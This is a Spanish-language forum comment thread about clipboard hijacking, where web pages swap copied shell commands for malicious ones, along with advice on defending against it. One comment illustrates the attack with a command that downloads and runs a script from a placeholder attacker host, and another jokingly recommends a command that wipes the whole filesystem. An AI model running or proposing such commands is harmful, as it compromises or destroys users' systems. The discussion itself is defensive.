Quien haga esto, se merece que lo hackeen sin duda alguna.

Pues adios a mi carrera

Vamos a ver. Dependerá de la fiabilidad de la fuente y de emplear un poco el cerebro para saber qué es lo que hace el comando que estés copiando. Si no fuera por la wiki de Arch, no podría ni haber instalado el SO.
No soy informático, como muchos por aquí.

Normalmente si copio y pego algo es que se que estoy haciendo y he ido a mirar exactamente como poner los parametros o así…

Quizas el peligro sería copiar un comando de instalación una aplicación con un comando que apunte a una versión “alternativa” de ella, así que hay que vigilar de donde obtienes esas instrucciones.

"Se advierte a los programadores, administradores de sistemas, investigadores de seguridad y aficionados a la tecnología que copian y pegan comandos de páginas web en una consola o terminal que corren el riesgo de que su sistema se vea comprometido."

Y aquí he dejado de leer. No porque no esté de acuerdo con el artículo, sino porque no soy ninguna de esas cosas. Si copio algo en internet es o bien texto, o bien una dirección de página web.

#4 #5 La cosa es que lo que copies de la web X ,no tiene porqué ser lo que pegues en tu línea de comando y puede que incluso se autoejecute.
Por eso se suele recomendar pegarlo en un bloc de notas antes

Saludos

#2 #3 #4 #5 Efectivamente no habéis leído nada ni os habéis enterado de qué va el articulo.

El ataque es que mediante javascript en la pagina tu crees que estas copiando un texto como 'sudo apt upgrade' cuando en realidad estas copiando 'curl attacker-domain:8000/shell.sh | sh'

#3 alguien que no ha leído el artículo. Lo que dice es que lo que la página web envía al portapapeles no tiene por qué ser lo que copiaste, así que puedes copiar un comando inocuo y cuando lo pegas, que sea un comando distinto (y con un salto de línea al final para que se ejecute)

No hay tiempo material para desarrollar todo el código desde cero. Siempre vas a tener que copiar y pegar algo, tirar de librerías, etc.

#6 Puedes pegarlo también en la misma barra de direcciones del navegador, así no cambias de aplicación.

Borrado!

Por algo la genial app 'Windows Terminal' advierte siempre que pegas un comando que incluye fin de línea.

Curaos en salud y pegad siempre antes en vuestro editor de texto favorito (vim) y revisad.

#6 Notepad++, sus opciones de edición con Regex incluidas y el plugin de Compare me ha salvado meses de trabajo.
Fan es poco.

#4 #7 #6 Entiendo que esto es pa la consola de comandos, porque al pegar lanza la ejecucion con lo que es un ataque a sysadmins y demás súcubos de averno. Los programadores de bien, los que dependemos de un compilador como que esto no afecta demasiado más allá de que home colega no puedes basar todo tu trabajo en copiar y pegar, tendrás que entender las instrucciones que estas pegando.

borrado... sorry!

#3 #4 En el artículo explica que no es que no sepas qué hace el comando en cuestión, si no que con un script la página te cambia el contenido del texto que copias por otro totalmente diferente, añadiendo un <Intro> al final, con las consecuencias que esto puede tener. (O sea, que ejecutes en consola cualquier cosa que quiera el "atacante").

Recordad amigos, nunca naveguéis sin NoScript.

#4 Quizás la noticia explica cuál es el peligro.

#3 Ahí está, esa es la clave, yo el comando que siempre me soluciona todo y que recomiendo a todo el mundo es
$sudo rm -rf /
...y adiós problema

#9 Lo suyo es utilizar una consola que cuando pegas algo con un salto de línea, te muestre un popup de confirmación con el texto que vas a a pegar.

#15 Yo es que soy hombre orquesta. Lo mismo te programo un API que te lanzo un script en el servidor

#8 Por eso #3 dice depende de la fiabilidad de la fuente. Por ejemplo sabes que en StackOverflow eso no va a pasar.

En cualquier caso, la verdad es que es algo que nunca he tenido en cuenta, y lo pasaré por un editor de texto antes cuando la fuente no es conocida.

#14 Notepad++ o #13 vim?

#4 Tal como explica el artículo, te meten un salto de línea al final con lo que solo pegarlo en la consola se puede ejecutar. Además, con javascript, consiguen que el texto que copias realmente no sea el mismo que lees en la web donde lo copias.

#15 ¿Entender que?

En este caso hay dos variantes distintas... No saber lo que estás pegando pero que sea lo mismo que estás copiando. Y saber lo que estás copiando pero que no sea lo mismo que estás pegando

Saludos

#22 Ah pero picas el scritp en tu editor de referencia (los hombres de verdad lo dibujamos a raton alzado en el paint) y luego lo ejecutas, el proceso intermedio ya te protege contra estas mierdas que estan pensadas pa los que directamente copian y pegan en el terminal sin miedo a nada

#26 Home meu yo cuando copio 1º leo lo que voy a copiar y luego copio y adapto lo que me obliga a volver a leer... lo cual a huevos te hace revisar en los dos puntos...

(por no hablar de que luego el codigo se prueba en DES y QAS antes y ya verias algo rarete, porque si, me averguenza admitirlo pero yo soy de esas nenazas que tiene entornos estanco de pruebas y desarrollo... es triste admitirlo pero me gano la vida así a base de vender mi dignidad con maquinas de pruebas que garantizen la seguridad)

#21 ¿Sabes si eso se puede configurar en el terminal de gnome? ¿me puedes recomendar alguna consola más segura?
Gracias

#8 Si la he leído, y es bastante interesante.
Sobre lo de copiar de fuentes fiables que comenta #3, cualquier sitio puede haber sido crackeado y aunque suela ser un sitio de confianza puede que un día en concreto no lo sea.

La altenartiva de pegar en un editor de texto es la mejor opción, pero, siendo sinceros, nadie la hace ni la va a hacer salvo que estos ataques se vuelvan demasiado frecuentes.

No sé rick, a mi desde Firefox me copia bien, parece que no afecta a Firefox. Lo he probado en chrome y efectivamente se puede cambiar el portapapeles.

Por otro lado, me parece de risa que una web puede alterar tu portapapeles sin tu consentimiento.

RIP Chromium users.

#20 El archivo .bashrc tiene un alias que activa siempre el parámetro -i en rm, entiendo que es como una salvaguarda.

#10 meneame es tu lugar, pequeño padawan.

#29 Ni idea, pero me imagino que alguna opción habrá.

Yo es que para trabajar estoy obligado a utilizar Windows, así que utilizo Mobaxterm y desde ahí conecto a las máquinas de Linux.

#29 La fuente original recomienda escribir el carácter "#" antes de pegar, de esta forma si se ejecuta automáticamente, el sistema lo entiende como un comentario y no hace nada.
cc #21

#15 "no puedes basar todo tu trabajo en copiar y pegar"
Jajaja ya, cuéntame otra.

#36 Home sutil diferencia:

-Tu trabajo es copiar y pegar? Sip
-Tu trabajo consiste en copiar y pegar? Nop, tambien tengo que entender que copio, que pego y como lo adapto.

#24 Emacs!

Cuando no falla el arranque claro.

<sys/errno.h>: Editor too big!

#18 Vieeeeeeejuuuunnooooooooooooo!!!

Lo peor de todo es que probablemente también uses Ublock Origin. Con esa extensión no hacen falta los deshabilitadores de JS.

Quien no usa el Notepad es un parguela

#37 Ya claro, y ahora me dirás que eres uno de esos gurús que aparte de copipastear de stackoverflow escribe su propio código

#14 El mejor editor de texto ever :-). Muy fan tambien.

#41 lo tallo en tablillas de jade y nácar

#28 Si hombre...y seguro que agendaras las intervenciones, avisarás a todos los grupos, pedireis backup y tendrás el rollback preparado. ¿Que te crees que estás en Linkedin?

Saludos

#23 Que no ha pasado no significa que no vaya a pasar. Cualquier día hacker malicioso se hace con el control de cualquier CDN de esas en las que todo el mundo confía o con el control de  ajax.googleapis al que mucha gente invoca para usar jquery.  Quizás tarden cinco minutos en arreglarlo, pero las consecuencias pueden ser desastrosas. 

#44 E incluso hacemos planes de despliegue y se cumplen, e incluso si la funcionalidad es critica y gorda echamos a todos los usuarios y hacemos un freeze time hasta comprobar que todo esta perita y se documentan las pruebas (validadas por negocio) tanto en el jira asociado como en confluence

Puta locura oye lo de seguir el manual

#35 Añadir un # al principio no sirve de nada si el contenido cuenta con varias líneas con salto de línea al final, pues sólo evitará la ejecución de la primera línea.
CC #29

#39 emojipedia.org/person-shrugging-medium-light-skin-tone/

#47 Bien visto

#31 Con Firefox me pasa tambien. Tienes desactivado el JS o alguna extension que controle el JS?
La funcion de copiar en el portapapeles es gracias al JS.

#45 Hombre, pues claro. Y lo mismo un día sales de casa y te atropella un camión.

Está claro que todo lo que hagas en Internet tiene cierto riesgo. Todo. Por un lado u otro te pueden joder, o hackear un sitio, o una fuente de datos o el camino hacia ellos... Pero la probabilidad de que pase, de que te pille en medio y, además, el daño que te haga sea grande pues es menor. Si usas GoogleApis pues es menor que si usas fulanitoApis.

(Desde luego que las precauciones en general hay que tenerlas. Porque nadie pensaba que iba a arder el puto OVH entero y ahí está, chamuscao)

#45 me da la sensación que antes hackean tu hosting compartido de dos duros que un CDN ofrecido por una grande

#31 A mí me funciona en Firefox 95.0.2, así que habrá que tener cuidado por si acaso.

#24 Notepad++ en Windows y vim en Linux.
No siempre me dejan elegir S.O.

#21 #29 tengo la mala costumbre de ir documentando en ficheros de texto así que nunca va a consola directamente.

#29 Curiosamente lo hace la Windows Terminal. La vengo usando desde hace unos meses con un Ubuntu instalado en Win10. Si pegas contenido con un salto de línea te lo muestra y te pregunta si estás seguro porque podría ser dañino.
Anda que no habré metido veces la pata al meter código de portapapeles que contenía otra cosa distinta a lo que creía (por haber seleccionado un texto sin darme cuenta)

#55 Seguramente es la opción más sensata.

#15 La versión para programadores de este ataque (muy similar vaya) se llama trojan source y creo que se publico hace no mucho en estas mismas páginas:

www.securityweek.com/trojan-source-attack-abuses-unicode-inject-vulner

Ahora fiate de servidores git públicos....

#47 Aparte de que si prolifera el uso de almohadillas, empezarán a poner saltos de carro como primer caracter.

El truco de toda la vida: pegas primero en el bloc de notas y a tomar por culo el formato. Luego ya, copias y pegas sólo lo que quieres.

#50 Tengo activado JS, pero en su día seguí un tutorial que te ponía firefox tocho, todo muy "privado", yo por ejemplo si cierro todas las pestañas de meneame y lo vuelvo a abrir, ya no estoy logueado, tengo que loguearme de nuevo. Algunas funciones de 3D tampoco me funcionan en firefox.

Revisando el tutorial, veo que la línea en concreto es esta:
dom.event.clipboardevents.enabled = false

Hay que cambiarla en about:config.

Por si a alguien le interesa:
restoreprivacy.com/firefox-privacy/

Es muy incómodo al principio, pero se puede vivir con ello y te aporta mucha más privacidad y seguridad que la configuración por defecto.

#47 pues en vez de # al comienzo pones una línea:<br>echo <<dontbreakmyballs<br>y ya no importa que ponga retornos de carro.

#53 échale un ojo a #61 que igual te interesa

#39 Ublock Origin funciona con listas negras, así que no va a filtrar javascript malicioso externo que va cambiando dominio o IP, que es lo que hacen los ciberdelincuentes

Lo único que te protegerá son extensiones bloqueadoras con listas blancas, como NoScript o uMatrix... la pega es que rompen webs con gran facilidad (especialmente uMatrix sigue rompiendo ciertas webs incluso tras darles permisos totales)

Lo ideal sería que los navegadores y empresas estandarizadoras se pusieren a crear un sistema de permisos para JS, para impedir usos abusivos o maliciosos (el acceso al historial y portapapeles) salvo en escenarios seguros o previa autorizacion del usuario.

#62 <br>Ostra, por lo que se vé a menéame no le gusta los < <<br><br>Había puesto una línea:<br> echo < < dontbreakmyballs<br>(los < juntos)<br> 

#62 Una línea "HERE DOCUMENT",  joder, menéame, qué pesado eres.

Leer antes de pulsar el enter.

E incluso, pegarlo en tu editor de texto antes de cualquier cosas.

E incluso mejor, entender que estas leyendo y escribirlo tu a manita.

#56 Acabo de pegar en la consola por error un log de 200 líneas

#68 Te aseguro que no eres el primero

Y te imagino buscando a ver si por un casual alguno de ellos pudiera constituir un comando que se pudiera haber ejecutado (obviamente uno de apache no debería dar problema)

#52 Por supuesto. Pero esto se está intentando. Un colega que se dedica al análisis forense estuvo investigando ataques contra una compañía de publicidad online española. No es ninguna de las grandes como Google Adwords. 

#69 Era un log de correo, así que aparte de borrarme el historial de comandos no ha pasado nada, pero cuando te pasas medio día copiando y pegando cosas entre consolas suele ser muy normal pegar lo que no debes y que creías que habías cambiado en el portapapeles por otra cosa.
Ayer mismo entre "cp" por aquí "rm" por allá me cepillé un fichero que no debía. Menos mal que era una tontería prescindible.
Lo de pedir confirmación al pegar varias líneas en la consola parece que sería una característica útil

Ya claro y qué va a ser lo próximo? No utilizar stackoverflow? Y COMO TRABAJO??

#14 y desde hace varias versiones al cerrarlo no cierra los ficheros no guardados. Puede que sea el ptrograma que más tiempo me ahorra quitando el IDE.

No uséis el copiar y pegar.
Repito, no uséis el copiar y pegar.
Lo digo de nuevo, no uséis el copiar y pegar.
No uséis el copiar y pegar.

No pienso pasar por un block de notas todos los comandos que robo de stack overflow. Mi productividad se iría al traste. Prefiero jugarmela.

#29 El terminal de xfce lo hace automáticamente.

Edito: por lo menos en manjaro.

#52 creo que ya ha pasado, alguna vez han colado malware en CDNs

#71 Pues acabo de probar esto ....
cirw.in/blog/bracketed-paste
unix.stackexchange.com/a/600641

Establecer en
~/.inputrc

set enable-bracketed-paste on

No lo conocía, y no está mal ... Al menos te da tiempo a rectificar

y si copias, no te olvides de copiar también el where del delete from

#0 Parece que hace tiempo que se viene hablando de ello ...
security.stackexchange.com/questions/39118/how-can-i-protect-myself-fr y hay protección

#6 jaja, si, el típico guion largo que te parece un guion normal

#50 A mi con Firefox en Ubuntu tampoco me pasa (con uBlock y Privacy badger). He tenido que hacerlo con Chrome para ver el efecto.

#78 Lo iré probando, porque parece que funciona. También en Ubuntu parece que es el modo por defecto, aunque no veo dónde está configurado, porque veo que se comporta igual sin ponerlo

#15 si, si, se tienen que entender, y tal, pero copio, pego, y después cambiamos parámetros.....
Y si en alguna ocasión un trozo de código hace su magia y no consigo entender porqué.....pues igualmente lo dejo (pasa pocas veces! )

#8 Yo tengo la costumbre de hacer un diario de todos los servidores que monto o de los problemas raros que soluciono para tenerlo todo documentado.

Me apoyo en un TXT donde primero copio los comandos y luego los ejecuto en el equipo así que sería raro que me la pegasen, también hay que entender lo que se está haciendo, claro.

Pero, aunque ya lo había leido antes, me ha venido bien para reafirmarme en esta práctica de pasar antes por un TXT y luego ejecutar.

#1 No sé si vas de prepotente o tienes ni puta idea...

#5 Claro, dejas de leer y no te enteras. Precisamente ocurre al copiar un texto con un comando.

#75 Si haces <ctrl>+a, <ctrl>+c en Stack Overflow y <ctrl>+v en Notepad++, puedes tener todo el Stack Overflow en un txt.

#86 A ver si el que no tiene ni puta idea eres tu aparte de demostrar tu falta de profesionalidad. Quien ejecute código en sus sistemas, que ha cogido de una web y no lo haya revisado previamente para entender lo que hace antes de lanzarlo, merece lo que le pase y así aprenderá.

#89 Yo no he dicho lo que no sé o no sé. Pero copiar un comando (por mil razones) de una web es de lo más normal.

Por cierto, no habla de copiar código, sino comandos, pero tú a lo tuyo.

Insisto, había dos opciones con tu comentario...

#68 Mientras no te olvides de poner el where en el delete from, todo ok

#43 Me quedo flipao con la gente que copia código lo ejecuta directamente, cuando les planteas que antes que lanzar nada habrá que analizarlo, entenderlo y/o adaptarlo te miran raro....poco nos pasa.

#81 Y las putas comillas, que hay como 5 tipos y según la fuente se distinguen o no: ", ', ` , ´, “, ”

#90 Copiar un comando o fragmento de código de una fuente externa es normal, ejecutarlo sin entenderlo primero o probarlo y confirmar que es válido para tu sistema eso no es lo normal y si te dedicas profesionalmente a ello, apaga y vamonos.

#91 Eso creo que no me ha pasado en la vida, pero nunca he entendido como algo tan peligroso no lo remediaron en el primer diseño que hicieron del SQL. Supongo que antes, por las restricciones de hardware que se tenían, y que normalmente la gente sabía lo que se hacía, no le daban importancia

#94 Paso de ti. Anda, léelo, sigues discutiendo sin haberlo leído y entendido el problema.

#95 A mi me ha pasado dos veces, pero con el UPDATE y en una BD de desarrollo (bien) pero con auto-commit (mal) ¯_(ツ)_/¯

#64 Permite que diga: pero qué pollas estás diciendo?!

#96 Yo lo he entido perfectamente. Lanzar comandos que te has copiado y pegado en un texto y no has analizado antes de ejecutar, por que ahí ves que lo que supuestametne has copiado no es lo que tienes delante, y lo has pegado directamente lanzandolo en la ventana de comandos, o en un tu entorno de ejecución. A mi me está quedando muy claro lo que eres tu.

Que JavaScript pueda modificar el contenido del portapapeles es para hacérselo mirar. Supongo que está definido en el estándar y lo implementan todos los navegadores. Yo tenía a la gente que define el estándar por genios, pero tendré que replanteármelo.